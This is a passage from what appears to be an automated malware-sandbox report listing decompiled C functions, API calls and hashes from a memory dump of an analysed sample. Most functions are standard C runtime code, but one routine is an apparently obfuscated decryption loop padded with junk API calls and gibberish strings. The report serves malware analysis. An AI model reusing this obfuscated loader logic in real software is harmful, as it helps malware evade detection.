                  • Part of subcall function 004084DD: Sleep.KERNEL32(000003E8,00000000,?,00409139,KERNEL32.DLL,?,00409185,?,?,00406559,00406AC8), ref: 004084E9
                  • Part of subcall function 004084DD: GetModuleHandleW.KERNEL32(?,?,00409139,KERNEL32.DLL,?,00409185,?,?,00406559,00406AC8), ref: 004084F2
                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040921C
                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040922C
                • __lock.LIBCMT ref: 0040924E
                • InterlockedIncrement.KERNEL32(0042A7C8), ref: 0040925B
                • __lock.LIBCMT ref: 0040926F
                • ___addlocaleref.LIBCMT ref: 0040928D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                • API String ID: 1028249917-2843748187
                • Opcode ID: 68256f4be896964c5d435e25741913e8686e0de5fc390827696fc5543748ed05
                • Instruction ID: fc8438a26ca637893680a080df1e2d86f67f339e7b898e06238f5e0f13d8e124
                • Opcode Fuzzy Hash: 68256f4be896964c5d435e25741913e8686e0de5fc390827696fc5543748ed05
                • Instruction Fuzzy Hash: AE118171901702AFD720EF669941B4ABBE0AF04318F10457FE499B62E2CB78A9419F5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00403450(unsigned int* _a4) {
                				char _v1024;
                				long _v1028;
                				intOrPtr _v1032;
                				intOrPtr _v1036;
                				char _v1040;
                				struct _COORD _v1044;
                				signed int _v1048;
                				char _v1052;
                				signed int _v1056;
                				signed int _v1060;
                				signed int _v1064;
                				unsigned int _v1068;
                				unsigned int _v1072;
                				signed int _v1076;
                				void* __edi;
                				intOrPtr* _t78;
                				intOrPtr _t80;
                				signed int _t82;
                				unsigned int* _t100;
                				intOrPtr _t106;
                				intOrPtr _t108;
                				intOrPtr _t109;
                				signed int _t125;
                				intOrPtr _t126;
                
                				_t78 = _a4;
                				_t106 =  *0x42b648; // 0x8432243a
                				_t126 =  *0x42b64c; // 0xd4efccad
                				_v1072 =  *_t78;
                				_v1068 =  *((intOrPtr*)(_t78 + 4));
                				_v1052 = 0;
                				E00403430( &_v1052,  *_t78);
                				_v1052 = _v1052 + 0x23f;
                				if( *0x667f64 == 0x14) {
                					EnumResourceLanguagesW(0, L"mifotupoh", L"jeguxufo xevuholucedumahemalaxavebu", 0, 0);
                				}
                				_t80 =  *0x42b650; // 0x16c4cd93
                				_t108 =  *0x42b654; // 0x315399cb
                				_v1036 = _t80;
                				_v1032 = _t108;
                				_v1040 = 0x20;
                				do {
                					_v1064 = 2;
                					_v1064 = _v1064 + 3;
                					_t109 =  *0x667f64;
                					_t82 = _v1072 << 4;
                					_v1076 = _t82;
                					if(_t109 == 0xc) {
                						_v1044.Y = 0;
                						_v1044.X = 0;
                						ReadConsoleOutputCharacterA(0,  &_v1024, 0, _v1044,  &_v1028);
                						_t82 = _v1076;
                						_t109 =  *0x667f64;
                					}
                					_v1076 = _t82 + _v1036;
                					if(_t109 != 0xfa9) {
                						if(_t109 == 0x3eb) {
                							 *0x667ed0 = 0;
                						}
                					} else {
                						 *0x667f60 = 0xedeb2e40;
                					}
                					_v1060 = _v1072;
                					_v1060 = _v1060 + _v1052;
                					 *0x667f5c = 0xf4ea3dee;
                					_v1048 = _v1072 >> _v1064;
                					E00403440( &_v1048, _v1032);
                					_v1076 = _v1076 ^ _v1060;
                					if( *0x667f64 == 0x9e6) {
                						OpenMutexW(0, 0, L"Kis");
                					}
                					_v1048 = _v1048 ^ _v1076;
                					_v1068 = _v1068 + 0x64;
                					_v1068 = _v1068 - _v1048;
                					_v1068 = _v1068 - 0x64;
                					E00403420(_v1068,  &_v1076);
                					_v1076 = _v1076 + _t106;
                					_v1056 = 0;
                					_v1056 = _v1056 + _v1052;
                					_v1056 = _v1056 + _v1068;
                					_v1060 = _v1056;
                					_t113 = _v1064;
                					_t125 = (_v1068 >> _v1064) + _t126;
                					_v1076 = _v1076 ^ _v1060;
                					if( *0x667f64 == 0x121) {
                						__imp__AddConsoleAliasW(0, 0, 0);
                					}
                					_v1076 = _v1076 ^ _t125;
                					_v1072 = _v1072 - _v1076;
                					E00403410( &_v1052, _t113, 0);
                					_t72 =  &_v1040;
                					 *_t72 = _v1040 - 1;
                				} while ( *_t72 != 0);
                				_t100 = _a4;
                				 *_t100 = _v1072;
                				_t100[1] = _v1068;
                				return _t100;
                			}



























                0x00403456
                0x00403463
                0x0040346a
                0x00403478
                0x0040347c
                0x00403480
                0x00403484
                0x00403489
                0x00403498
                0x004034a7
                0x004034a7
                0x004034ad
                0x004034b2
                0x004034b8
                0x004034bc
                0x004034c0
                0x004034d0
                0x004034d0
                0x004034d8
                0x004034e1
                0x004034e7
                0x004034ea
                0x004034f1
                0x004034f7
                0x00403501
                0x00403512
                0x00403518
                0x0040351c
                0x0040351c
                0x00403526
                0x00403530
                0x00403544
                0x00403546
                0x00403546
                0x00403532
                0x00403532
                0x00403532
                0x00403550
                0x00403558
                0x0040356e
                0x00403578
                0x0040357c
                0x00403585
                0x00403593
                0x0040359c
                0x0040359c
                0x004035a6
                0x004035ae
                0x004035b3
                0x004035b7
                0x004035c4
                0x004035c9
                0x004035cd
                0x004035d5
                0x004035de
                0x004035e6
                0x004035ee
                0x004035f4
                0x004035fa
                0x00403608
                0x0040360d
                0x0040360d
                0x00403613
                0x0040361b
                0x00403623
                0x00403628
                0x00403628
                0x00403628
                0x00403633
                0x00403645
                0x00403647
                0x00403651

                APIs
                • EnumResourceLanguagesW.KERNEL32 ref: 004034A7
                • ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,00000020,?), ref: 00403512
                • OpenMutexW.KERNEL32(00000000,00000000,Kis), ref: 0040359C
                • AddConsoleAliasW.KERNEL32(00000000,00000000,00000000), ref: 0040360D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: Console$AliasCharacterEnumLanguagesMutexOpenOutputReadResource
                • String ID: $Kis$d$jeguxufo xevuholucedumahemalaxavebu$mifotupoh
                • API String ID: 3309625250-456979391
                • Opcode ID: 327142d5e08070fa53213981188f08cd567707b7fc8986b1b84cc82561de3fce
                • Instruction ID: a56c4c5d8b00a0ac0ce190d433959f56fd084e54d139ce93484046b40ae91c12
                • Opcode Fuzzy Hash: 327142d5e08070fa53213981188f08cd567707b7fc8986b1b84cc82561de3fce
                • Instruction Fuzzy Hash: 2F5100755083419FC314CF2AD98492BBBF4FBD8718F404A2EF489A3260C374EA49CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E004056F3(intOrPtr __ecx) {
                				void* _t47;
                				intOrPtr _t48;
                				void* _t53;
                				void* _t54;
                				void* _t56;
                				intOrPtr _t57;
                				void* _t58;
                				void* _t61;
                
                				_push(0x2c);
                				_push(0x4282d0);
                				E00407404(_t47, _t54, _t56);
                				_t48 = __ecx;
                				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                				_t57 =  *((intOrPtr*)(_t58 + 8));
                				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                				 *((intOrPtr*)(_t58 - 0x28)) = E00405236(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409336(__ecx, _t53, _t61) + 0x88));
                				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409336(_t48, _t53, _t61) + 0x8c));
                				 *((intOrPtr*)(E00409336(_t48, _t53, _t61) + 0x88)) = _t57;
                				 *((intOrPtr*)(E00409336(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                				 *(_t58 - 4) = 1;
                				 *((intOrPtr*)(_t58 - 0x1c)) = E004052DB(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                				 *(_t58 - 4) = 0xfffffffe;
                				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                				E00405819(_t48, _t55, _t57);
                				return E00407449( *((intOrPtr*)(_t58 - 0x1c)));
                			}











                0x004056f3
                0x004056f5
                0x004056fa
                0x004056ff
                0x00405701
                0x00405704
                0x00405707
                0x0040570a
                0x00405711
                0x00405722
                0x00405730
                0x0040573e
                0x00405746
                0x00405754
                0x0040575a
                0x00405761
                0x00405764
                0x0040577a
                0x0040577d
                0x004057f2
                0x004057f9
                0x00405800
                0x0040580d

                APIs
                • __CreateFrameInfo.LIBCMT ref: 0040571B
                  • Part of subcall function 00405236: __getptd.LIBCMT ref: 00405244
                  • Part of subcall function 00405236: __getptd.LIBCMT ref: 00405252
                • __getptd.LIBCMT ref: 00405725
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 00405733
                • __getptd.LIBCMT ref: 00405741
                • __getptd.LIBCMT ref: 0040574C
                • _CallCatchBlock2.LIBCMT ref: 00405772
                  • Part of subcall function 004052DB: __CallSettingFrame@12.LIBCMT ref: 00405327
                  • Part of subcall function 00405819: __getptd.LIBCMT ref: 00405828
                  • Part of subcall function 00405819: __getptd.LIBCMT ref: 00405836
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: 19292ffba2a9be088c4ceb34838378d7a00e069328f228661fdbde71ff2e5fd1
                • Instruction ID: 794748d5a1fe47ae6608aa13b861251fba8ff341c13894f19401e09624ddf452
                • Opcode Fuzzy Hash: 19292ffba2a9be088c4ceb34838378d7a00e069328f228661fdbde71ff2e5fd1
                • Instruction Fuzzy Hash: 9411DA71D40209EFDB10EFA5D546A9E7BB0FF08318F50806EF814A7292DB3899119F55
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E0040B6F0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t15;
                				LONG* _t21;
                				long _t23;
                				void* _t31;
                				LONG* _t33;
                				void* _t34;
                				void* _t35;
                
                				_t35 = __eflags;
                				_t29 = __edx;
                				_t25 = __ebx;
                				_push(0xc);
                				_push(0x428540);
                				E00407404(__ebx, __edi, __esi);
                				_t31 = E00409336(__ebx, __edx, _t35);
                				_t15 =  *0x42acec; // 0xfffffffe
                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                					E00409F79(_t25, _t31, 0xd);
                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                					_t33 =  *(_t31 + 0x68);
                					 *(_t34 - 0x1c) = _t33;
                					__eflags = _t33 -  *0x42abf0; // 0x8b1608
                					if(__eflags != 0) {
                						__eflags = _t33;
                						if(_t33 != 0) {
                							_t23 = InterlockedDecrement(_t33);
                							__eflags = _t23;
                							if(_t23 == 0) {
                								__eflags = _t33 - 0x42a7c8;
                								if(__eflags != 0) {
                									_push(_t33);
                									E00406A51(_t25, _t31, _t33, __eflags);
                								}
                							}
                						}
                						_t21 =  *0x42abf0; // 0x8b1608
                						 *(_t31 + 0x68) = _t21;
                						_t33 =  *0x42abf0; // 0x8b1608
                						 *(_t34 - 0x1c) = _t33;
                						InterlockedIncrement(_t33);
                					}
                					 *(_t34 - 4) = 0xfffffffe;
                					E0040B78B();
                				} else {
                					_t33 =  *(_t31 + 0x68);
                				}
                				if(_t33 == 0) {
                					E0040850D(_t29, 0x20);
                				}
                				return E00407449(_t33);
                			}










                0x0040b6f0
                0x0040b6f0
                0x0040b6f0
                0x0040b6f0
                0x0040b6f2
                0x0040b6f7
                0x0040b701
                0x0040b703
                0x0040b70b
                0x0040b72c
                0x0040b732
                0x0040b736
                0x0040b739
                0x0040b73c
                0x0040b742
                0x0040b744
                0x0040b746
                0x0040b749
                0x0040b74f
                0x0040b751
                0x0040b753
                0x0040b759
                0x0040b75b
                0x0040b75c
                0x0040b761
                0x0040b759
                0x0040b751
                0x0040b762
                0x0040b767
                0x0040b76a
                0x0040b770
                0x0040b774
                0x0040b774
                0x0040b77a
                0x0040b781
                0x0040b713
                0x0040b713
                0x0040b713
                0x0040b718
                0x0040b71c
                0x0040b721
                0x0040b729

                APIs
                • __getptd.LIBCMT ref: 0040B6FC
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __amsg_exit.LIBCMT ref: 0040B71C
                • __lock.LIBCMT ref: 0040B72C
                • InterlockedDecrement.KERNEL32(?), ref: 0040B749
                • InterlockedIncrement.KERNEL32(008B1608), ref: 0040B774
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                • String ID:
                • API String ID: 4271482742-0
                • Opcode ID: 8cdf4d8e4d9f20106b5351e911dd18681c6c75bb76eaccecfd36a8c14c587c9a
                • Instruction ID: 57e374f5b7c55cbf4d0102de865f26309dd3feaea6e2191c399ad46f9a8137bc
                • Opcode Fuzzy Hash: 8cdf4d8e4d9f20106b5351e911dd18681c6c75bb76eaccecfd36a8c14c587c9a
                • Instruction Fuzzy Hash: DF015E31A40622ABC721AB66954675E7760FB44714F54403BF800B73E1DB7CAD92CBDE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E00406A51(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr* _t10;
                				intOrPtr _t13;
                				intOrPtr _t23;
                				void* _t25;
                
                				_push(0xc);
                				_push(0x428390);
                				_t8 = E00407404(__ebx, __edi, __esi);
                				_t23 =  *((intOrPtr*)(_t25 + 8));
                				if(_t23 == 0) {
                					L9:
                					return E00407449(_t8);
                				}
                				if( *0x66e6e4 != 3) {
                					_push(_t23);
                					L7:
                					if(HeapFree( *0x42c0fc, 0, ??) == 0) {
                						_t10 = E00406554();
                						 *_t10 = E00406512(GetLastError());
                					}
                					goto L9;
                				}
                				E00409F79(__ebx, __edi, 4);
                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                				_t13 = E00409FAC(_t23);
                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                				if(_t13 != 0) {
                					_push(_t23);
                					_push(_t13);
                					E00409FDC();
                				}
                				 *(_t25 - 4) = 0xfffffffe;
                				_t8 = E00406AA7();
                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                					goto L9;
                				} else {
                					_push( *((intOrPtr*)(_t25 + 8)));
                					goto L7;
                				}
                			}







                0x00406a51
                0x00406a53
                0x00406a58
                0x00406a5d
                0x00406a62
                0x00406ad9
                0x00406ade
                0x00406ade
                0x00406a6b
                0x00406ab0
                0x00406ab1
                0x00406ac1
                0x00406ac3
                0x00406ad6
                0x00406ad8
                0x00000000
                0x00406ac1
                0x00406a6f
                0x00406a75
                0x00406a7a
                0x00406a80
                0x00406a85
                0x00406a87
                0x00406a88
                0x00406a89
                0x00406a8f
                0x00406a90
                0x00406a97
                0x00406aa0
                0x00000000
                0x00406aa2
                0x00406aa2
                0x00000000
                0x00406aa2

                APIs
                • __lock.LIBCMT ref: 00406A6F
                  • Part of subcall function 00409F79: __mtinitlocknum.LIBCMT ref: 00409F8F
                  • Part of subcall function 00409F79: __amsg_exit.LIBCMT ref: 00409F9B
                  • Part of subcall function 00409F79: EnterCriticalSection.KERNEL32(?,?,?,0040766D,00000004,004283D0,0000000C,0040BF9C,?,?,00000000,00000000,00000000,?,004092E8,00000001), ref: 00409FA3
                • ___sbh_find_block.LIBCMT ref: 00406A7A
                • ___sbh_free_block.LIBCMT ref: 00406A89
                • HeapFree.KERNEL32(00000000,?,00428390,0000000C,00407322,004032E5), ref: 00406AB9
                • GetLastError.KERNEL32(?,?,?,?,00428390,0000000C,00407322,004032E5), ref: 00406ACA
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                • String ID:
                • API String ID: 2714421763-0
                • Opcode ID: eb8e81c6b77b426a5da76bfed92e118ebfce9407ed76ce54dbf260f0ae8900db
                • Instruction ID: 8aa7a4ab30bbc867df2973424b9b26a8bcea8968b0616659199c0ec633f1b38e
                • Opcode Fuzzy Hash: eb8e81c6b77b426a5da76bfed92e118ebfce9407ed76ce54dbf260f0ae8900db
                • Instruction Fuzzy Hash: 09012C71A05212AADF20BBA1AC0675F3A649F11728F21803FF507B61D2DA7CD9909E5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 19%
                			E00405AA0(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				void* __ebp;
                				void* _t20;
                				void* _t22;
                				void* _t23;
                				intOrPtr* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t26 = __esi;
                				_t25 = __edi;
                				_t22 = __ebx;
                				_t29 = _a20;
                				if(_a20 != 0) {
                					_push(_a20);
                					_push(__ebx);
                					_push(__esi);
                					_push(_a4);
                					E00405A0E(__ebx, __edi, __esi, _t29);
                					_t27 = _t27 + 0x10;
                				}
                				_t30 = _a28;
                				_push(_a4);
                				if(_a28 != 0) {
                					_push(_a28);
                				} else {
                					_push(_t26);
                				}
                				E00404F8E(_t23);
                				_push( *_t25);
                				_push(_a16);
                				_push(_a12);
                				_push(_t26);
                				E00405478(_t22, _t25, _t26, _t30);
                				_push(0x100);
                				_push(_a24);
                				_push(_a16);
                				 *((intOrPtr*)(_t26 + 8)) =  *((intOrPtr*)(_t25 + 4)) + 1;
                				_push(_a8);
                				_push(_t26);
                				_push(_a4);
                				_t20 = E004056F3( *((intOrPtr*)(_t22 + 0xc)));
                				if(_t20 != 0) {
                					E00404F47(_t20, _t26);
                					return _t20;
                				}
                				return _t20;
                			}










                0x00405aa0
                0x00405aa0
                0x00405aa0
                0x00405aa5
                0x00405aa9
                0x00405aab
                0x00405aae
                0x00405aaf
                0x00405ab0
                0x00405ab3
                0x00405ab8
                0x00405ab8
                0x00405abb
                0x00405abf
                0x00405ac2
                0x00405ac7
                0x00405ac4
                0x00405ac4
                0x00405ac4
                0x00405aca
                0x00405acf
                0x00405ad1
                0x00405ad4
                0x00405ad7
                0x00405ad8
                0x00405ae0
                0x00405ae5
                0x00405ae9
                0x00405aec
                0x00405aef
                0x00405af5
                0x00405af6
                0x00405af9
                0x00405b03
                0x00405b07
                0x00000000
                0x00405b07
                0x00405b0d

                APIs
                • ___BuildCatchObject.LIBCMT ref: 00405AB3
                  • Part of subcall function 00405A0E: ___BuildCatchObjectHelper.LIBCMT ref: 00405A44
                • _UnwindNestedFrames.LIBCMT ref: 00405ACA
                • ___FrameUnwindToState.LIBCMT ref: 00405AD8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm
                • API String ID: 2163707966-1018135373
                • Opcode ID: 52055c2f57884fc084d47f376315b0f0a4211951245ac75f0d5f08d58a2915df
                • Instruction ID: a47f7dfc7554e592a1b86253121fc9585904a35423a575559cafd4c39be57d8f
                • Opcode Fuzzy Hash: 52055c2f57884fc084d47f376315b0f0a4211951245ac75f0d5f08d58a2915df
                • Instruction Fuzzy Hash: 9C017871100509BBCF12AF01CC45EAB3F6AEF44344F00412ABD08241A1C73AA8A1EFA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E0040E78B() {
                				signed long long _v12;
                				signed int _v20;
                				signed long long _v28;
                				signed char _t8;
                
                				_t8 = GetModuleHandleA("KERNEL32");
                				if(_t8 == 0) {
                					L6:
                					_v20 =  *0x4023a0;
                					_v28 =  *0x402398;
                					asm("fsubr qword [ebp-0x18]");
                					_v12 = _v28 / _v20 * _v20;
                					asm("fld1");
                					asm("fcomp qword [ebp-0x8]");
                					asm("fnstsw ax");
                					if((_t8 & 0x00000005) != 0) {
                						return 0;
                					} else {
                						return 1;
                					}
                				} else {
                					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                					if(__eax == 0) {
                						goto L6;
                					} else {
                						_push(0);
                						return __eax;
                					}
                				}
                			}







                0x0040e790
                0x0040e798
                0x0040e7af
                0x0040e75b
                0x0040e764
                0x0040e770
                0x0040e773
                0x0040e776
                0x0040e778
                0x0040e77b
                0x0040e780
                0x0040e78a
                0x0040e782
                0x0040e786
                0x0040e786
                0x0040e79a
                0x0040e7a0
                0x0040e7a8
                0x00000000
                0x0040e7aa
                0x0040e7aa
                0x0040e7ae
                0x0040e7ae
                0x0040e7a8

                APIs
                • GetModuleHandleA.KERNEL32(KERNEL32,00409CAA), ref: 0040E790
                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040E7A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsProcessorFeaturePresent$KERNEL32
                • API String ID: 1646373207-3105848591
                • Opcode ID: 1e6ec4a4387cd50c321e0f6e22b65e3f93e02cc2916a32b505df3e4a77ea7276
                • Instruction ID: 3a6cb4fc998e183041992d2f952b65302eb0dc8fb54f045fb071081984a9eedc
                • Opcode Fuzzy Hash: 1e6ec4a4387cd50c321e0f6e22b65e3f93e02cc2916a32b505df3e4a77ea7276
                • Instruction Fuzzy Hash: 73F03020A00A09E6DB042BB1AE0E36F7A78BB80742F9508B1E5D2F10D4DF7C8071D25A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E0040542F(intOrPtr* _a4) {
                				signed int _v8;
                				intOrPtr _t11;
                				intOrPtr* _t15;
                				intOrPtr* _t19;
                				void* _t23;
                				void* _t24;
                				void* _t25;
                				void* _t26;
                
                				_t11 =  *((intOrPtr*)( *_a4));
                				if(_t11 == 0xe0434f4d) {
                					__eflags =  *((intOrPtr*)(E00409336(_t23, _t24, __eflags) + 0x90));
                					if(__eflags > 0) {
                						_t15 = E00409336(_t23, _t24, __eflags) + 0x90;
                						 *_t15 =  *_t15 - 1;
                						__eflags =  *_t15;
                					}
                					goto L5;
                				} else {
                					_t32 = _t11 - 0xe06d7363;
                					if(_t11 != 0xe06d7363) {
                						L5:
                						__eflags = 0;
                						return 0;
                					} else {
                						 *(E00409336(_t23, _t24, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                						_push(8);
                						_push(0x4284a0);
                						E00407404(_t23, _t25, _t26);
                						_t19 =  *((intOrPtr*)(E00409336(_t23, _t24, _t32) + 0x78));
                						if(_t19 != 0) {
                							_v8 = _v8 & 0x00000000;
                							 *_t19();
                							_v8 = 0xfffffffe;
                						}
                						return E00407449(E0040D9F8(_t23, _t24, _t25));
                					}
                				}
                			}











                0x00405439
                0x00405440
                0x0040545f
                0x00405466
                0x0040546d
                0x00405472
                0x00405472
                0x00405472
                0x00000000
                0x00405442
                0x00405442
                0x00405447
                0x00405474
                0x00405474
                0x00405477
                0x00405449
                0x0040544e
                0x004096d2
                0x004096d4
                0x004096d9
                0x004096e3
                0x004096e8
                0x004096ea
                0x004096ee
                0x004096f9
                0x004096f9
                0x0040970a
                0x0040970a
                0x00405447

                APIs
                • __getptd.LIBCMT ref: 00405449
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 0040545A
                • __getptd.LIBCMT ref: 00405468
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC
                • API String ID: 803148776-624257665
                • Opcode ID: 2a60fa349f73d5ebf537322a8e0832c8dd4f06d0dbb62005c58b9533d6aa8f36
                • Instruction ID: 918537145168455b6401ea16aac596ce78ad9945df75791b6ab05e5e20afc3e1
                • Opcode Fuzzy Hash: 2a60fa349f73d5ebf537322a8e0832c8dd4f06d0dbb62005c58b9533d6aa8f36
                • Instruction Fuzzy Hash: A8E01A325401089FDB20AA66C047B6A3394EB48319F1541B6A848EB3E3C73CEC909D4A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040E677(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				intOrPtr _t25;
                				void* _t26;
                				void* _t28;
                
                				_t25 = _a16;
                				if(_t25 == 0x65 || _t25 == 0x45) {
                					_t26 = E0040DF68(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                					goto L9;
                				} else {
                					_t34 = _t25 - 0x66;
                					if(_t25 != 0x66) {
                						__eflags = _t25 - 0x61;
                						if(_t25 == 0x61) {
                							L7:
                							_t26 = E0040E058(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                						} else {
                							__eflags = _t25 - 0x41;
                							if(__eflags == 0) {
                								goto L7;
                							} else {
                								_t26 = E0040E57D(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                							}
                						}
                						L9:
                						return _t26;
                					} else {
                						return E0040E4C2(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                					}
                				}
                			}






                0x0040e67c
                0x0040e682
                0x0040e6f5
                0x00000000
                0x0040e689
                0x0040e689
                0x0040e68c
                0x0040e6a7
                0x0040e6aa
                0x0040e6ca
                0x0040e6dc
                0x0040e6ac
                0x0040e6ac
                0x0040e6af
                0x00000000
                0x0040e6b1
                0x0040e6c3
                0x0040e6c3
                0x0040e6af
                0x0040e6fa
                0x0040e6fe
                0x0040e68e
                0x0040e6a6
                0x0040e6a6
                0x0040e68c

                APIs
                Memory Dump Source
